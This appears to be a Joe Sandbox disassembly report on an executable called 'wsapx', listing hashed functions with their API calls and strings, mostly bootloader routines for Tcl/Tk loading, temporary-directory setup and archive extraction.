Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 507ab6c085842ddf94e9afc60cd82b16ede344e2615832170ec98ee68da7babe
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 3E41D7A2C0974A47E9659DA819146B8DF849FE2FB0DF812B0DD99633C7DD0C69878121

Function 00007FF7C71C9F10 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction ID: e000eabb9b931abb4a9cc5d8cb9a05f22a8a22267a40371cf11f985b546d4ded
Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction Fuzzy Hash: 9941F632714A5583FF04DF6AEA141A9B3A5FB88FE0B899436DE0D97B58DE3CD5428300

Function 00007FF7C71C8154 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: b033331b521f4ec9761a17043ca70a256cc32b69066a6e0b07bfc51e4d36f6f5
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: 3731E332B08B4286E764AF66B88512EA6D5EBC5FE0F944238EA5D53BD5DF3CD0038714

Function 00007FF7C71D95E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction ID: 85f95f50889b62ab415cf861dc9cf02de98ffa812dbc61cc4f8df341e2ece32e
Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction Fuzzy Hash: D4F06271B186968BDBA8DF69B842629B7D0F7587D0F808039E68D83B04DE3CD0628F14

Function 00007FF7C71BD37C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction ID: fa1f5582e30352a1973bc6382e6711538be11d1b50202af016a3677bf2845e89
Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction Fuzzy Hash: 3AA001A291C84AD2E659AF00B891025A320BBA1B20B800075E44E410B1EE2CA506D620

Function 00007FF7C71B76B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7C71B76C7
GetLastError.KERNEL32 ref: 00007FF7C71B76D9
GetProcAddress.KERNEL32 ref: 00007FF7C71B7715
GetLastError.KERNEL32 ref: 00007FF7C71B7727
GetProcAddress.KERNEL32 ref: 00007FF7C71B7740
GetLastError.KERNEL32 ref: 00007FF7C71B7752
GetProcAddress.KERNEL32 ref: 00007FF7C71B776B
GetLastError.KERNEL32 ref: 00007FF7C71B777D
GetProcAddress.KERNEL32 ref: 00007FF7C71B7799
GetLastError.KERNEL32 ref: 00007FF7C71B77AB
GetProcAddress.KERNEL32 ref: 00007FF7C71B77C7
GetLastError.KERNEL32 ref: 00007FF7C71B77D9
GetProcAddress.KERNEL32 ref: 00007FF7C71B77F5
GetLastError.KERNEL32 ref: 00007FF7C71B7807
GetProcAddress.KERNEL32 ref: 00007FF7C71B7823
GetLastError.KERNEL32 ref: 00007FF7C71B7835
GetProcAddress.KERNEL32 ref: 00007FF7C71B7851
GetLastError.KERNEL32 ref: 00007FF7C71B7863

Strings

Tcl_GetObjResult, xrefs: 00007FF7C71B7B55, 00007FF7C71B7B77
Tcl_Init, xrefs: 00007FF7C71B76C0, 00007FF7C71B76DF
Tcl_GetCurrentThread, xrefs: 00007FF7C71B7847, 00007FF7C71B7869
Tcl_CreateThread, xrefs: 00007FF7C71B7819, 00007FF7C71B783B
Tcl_SetVar2Ex, xrefs: 00007FF7C71B7B27, 00007FF7C71B7B49
Tcl_ConditionWait, xrefs: 00007FF7C71B7989, 00007FF7C71B79AB
Tcl_Free, xrefs: 00007FF7C71B7C3B, 00007FF7C71B7C5D
Failed to get address for %hs, xrefs: 00007FF7C71B76E8
Tcl_MutexFinalize, xrefs: 00007FF7C71B78FF, 00007FF7C71B7921
Tcl_ThreadQueueEvent, xrefs: 00007FF7C71B79B7, 00007FF7C71B79D9
Tcl_CreateInterp, xrefs: 00007FF7C71B770B, 00007FF7C71B772D
GetProcAddress, xrefs: 00007FF7C71B76EF
Tcl_Finalize, xrefs: 00007FF7C71B778F, 00007FF7C71B77B1
Tcl_ConditionNotify, xrefs: 00007FF7C71B795B, 00007FF7C71B797D
Tcl_Alloc, xrefs: 00007FF7C71B7C0D, 00007FF7C71B7C2F
Tk_GetNumMainWindows, xrefs: 00007FF7C71B7C97, 00007FF7C71B7CB9
Tcl_DoOneEvent, xrefs: 00007FF7C71B7761, 00007FF7C71B7783
Tk_Init, xrefs: 00007FF7C71B7C69, 00007FF7C71B7C8B
Tcl_EvalEx, xrefs: 00007FF7C71B7BB1, 00007FF7C71B7BD3
Tcl_NewStringObj, xrefs: 00007FF7C71B7ACB, 00007FF7C71B7AED
Tcl_EvalFile, xrefs: 00007FF7C71B7B83, 00007FF7C71B7BA5
Tcl_SetVar2, xrefs: 00007FF7C71B7A41, 00007FF7C71B7A63
Tcl_CreateObjCommand, xrefs: 00007FF7C71B7A6F, 00007FF7C71B7A91
Tcl_NewByteArrayObj, xrefs: 00007FF7C71B7AF9, 00007FF7C71B7B1B
Tcl_MutexLock, xrefs: 00007FF7C71B78A3, 00007FF7C71B78C5
Tcl_ConditionFinalize, xrefs: 00007FF7C71B792D, 00007FF7C71B794F
Tcl_DeleteInterp, xrefs: 00007FF7C71B77EB, 00007FF7C71B780D
Tcl_GetString, xrefs: 00007FF7C71B7A9D, 00007FF7C71B7ABF
Tcl_GetVar2, xrefs: 00007FF7C71B7A13, 00007FF7C71B7A35
Tcl_MutexUnlock, xrefs: 00007FF7C71B78D1, 00007FF7C71B78F3
Tcl_EvalObjv, xrefs: 00007FF7C71B7BDF, 00007FF7C71B7C01
Tcl_FinalizeThread, xrefs: 00007FF7C71B77BD, 00007FF7C71B77DF
Tcl_ThreadAlert, xrefs: 00007FF7C71B79E5, 00007FF7C71B7A07
Tcl_FindExecutable, xrefs: 00007FF7C71B7736, 00007FF7C71B7758
Tcl_JoinThread, xrefs: 00007FF7C71B7875, 00007FF7C71B7897

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: e44c84c5f4c6194a316a7a0326b91a82db1aba1e61f16489c3dffb044bcd3d5e
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: 2302C56095DB0793FA56BF65B895578A270AFE8F74FC41436C85E02660EF3CB24B8630

Function 00007FF7C71B81C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C71B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C71B45E4,00000000,00007FF7C71B1985), ref: 00007FF7C71B9439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF7C71B88A7,?,?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B821C

Part of subcall function 00007FF7C71B2810: MessageBoxW.USER32 ref: 00007FF7C71B28EA

Strings

LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7C71B8230
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF7C71B828D
\, xrefs: 00007FF7C71B8251
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7C71B81F3
CreateDirectory, xrefs: 00007FF7C71B836C
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF7C71B8363
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7C71B82C9
%.*s, xrefs: 00007FF7C71B82FC

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction ID: f31e43f7cc1ecf0000b0a3952f4641eef8875ed9369c8e0ed40dc8d8bcd1f458
Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction Fuzzy Hash: D3516751A2864283FB51BF25F8926BAE261AFD4FA0FC44431DD4E83695EE2CE5078760

Function 00007FF7C71B2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7C71B21AB
SelectObject.GDI32 ref: 00007FF7C71B21F2
DrawTextW.USER32 ref: 00007FF7C71B2215
SelectObject.GDI32 ref: 00007FF7C71B222B
ReleaseDC.USER32 ref: 00007FF7C71B223B
MoveWindow.USER32 ref: 00007FF7C71B228B
MoveWindow.USER32 ref: 00007FF7C71B22CB
MoveWindow.USER32 ref: 00007FF7C71B231E
MoveWindow.USER32 ref: 00007FF7C71B2366

Strings

P%, xrefs: 00007FF7C71B21FF

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: b69ec6ad47f99b26d8d78d5c386557fc31bd60fa7cc845e6c07e3b35e5390eb2
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 2351F536604BA187D634AF22B4581BAB7A1F798B61F004121EFDF43694DF3CD146CB20

Function 00007FF7C71B80B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF7C71B80EF
GetWindowLongPtrW.USER32 ref: 00007FF7C71B816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF7C71B8182
GetLastError.KERNEL32 ref: 00007FF7C71B818C
SetWindowLongPtrW.USER32 ref: 00007FF7C71B81A3

Strings

Needs to remove its temporary files., xrefs: 00007FF7C71B8175

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: 86d7806d4dccd00ecdf22ea55be2873d6fcdad52cfb7b10f5740765c9b675272
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: 98218861B09A42C3E756AF7AF894179E251EFD8FB0F884131DE2E437D4DE2CD6528620

Function 00007FF7C71C6300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C6343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C6730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C69CC

Strings

-, xrefs: 00007FF7C71C63D9
:, xrefs: 00007FF7C71C64FC
p, xrefs: 00007FF7C71C63F5
p, xrefs: 00007FF7C71C646D
f, xrefs: 00007FF7C71C6465

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 4abb384f242921e5caf117a6d7df74cc094bcb271b34403e32910553b9a08c28
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 02128062A0C25387FB207E94F155279F6A1FBD0F60FD44535E68A46AC4DF3CE5828B20

Function 00007FF7C71C1038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C1078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C1440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C16DF

Strings

f, xrefs: 00007FF7C71C1110
f, xrefs: 00007FF7C71C12C5
f, xrefs: 00007FF7C71C117A
p, xrefs: 00007FF7C71C1182
p, xrefs: 00007FF7C71C111D

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 5478132b5a48bde4f3d31b9344c6de7f427e734b29c478a26098793db5f17028
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 031261B1A4C14387FB20BE95B054679F261EBC0FB4FD84035D69946AC4DF7CE882AB21

Function 00007FF7C71B1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7C71B1108
malloc, xrefs: 00007FF7C71B110F
fread, xrefs: 00007FF7C71B11FD
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7C71B11F6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7C71B1098
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7C71B10CC
fseek, xrefs: 00007FF7C71B10D3

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 2048979618f4410f80e1bec86b0c2cfc624223f2fb3d1bf9b120f3ac00452a64
Instruction ID: 67127a4641d1bf354300442f931eb79464fd7d3ecc53737f83b1d70d28718333
Opcode Fuzzy Hash: 2048979618f4410f80e1bec86b0c2cfc624223f2fb3d1bf9b120f3ac00452a64
Instruction Fuzzy Hash: 2E4169A2A0865283EA10FF62B8416B9A395ABC4FE4FD54431ED1D47796DE3CE1078760

Function 00007FF7C71B1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7C71B1518
malloc, xrefs: 00007FF7C71B151F
fread, xrefs: 00007FF7C71B15E6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7C71B15DF
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7C71B149F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7C71B14DE
fseek, xrefs: 00007FF7C71B14E5

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 3e7eb559cb89a0d92ac7ace3cd91a7b613190ff46f0abfec8d204b44a62552d9
Instruction ID: b8c9533c1dff879ac79f854dec3860f975f53bc920527f97a2c7f245373c97bc
Opcode Fuzzy Hash: 3e7eb559cb89a0d92ac7ace3cd91a7b613190ff46f0abfec8d204b44a62552d9
Instruction Fuzzy Hash: 85419E61A0864287EA10EF66B4811B9E3A0BF85FF4FC44436ED5E47B95DE3CE5079B20

Function 00007FF7C71BEA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7C71BEAD5

Part of subcall function 00007FF7C71BFA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF7C71BFA6F
Part of subcall function 00007FF7C71BFA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7C71BFA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7C71BEBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7C71BEDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7C71BEF08

Strings

csm, xrefs: 00007FF7C71BEBD0
csm, xrefs: 00007FF7C71BEAEF
csm, xrefs: 00007FF7C71BEB56

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: a642eb1b9395f5677efa44121c080aac7778333b7e7bdf810118405a9d7ae0a3
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
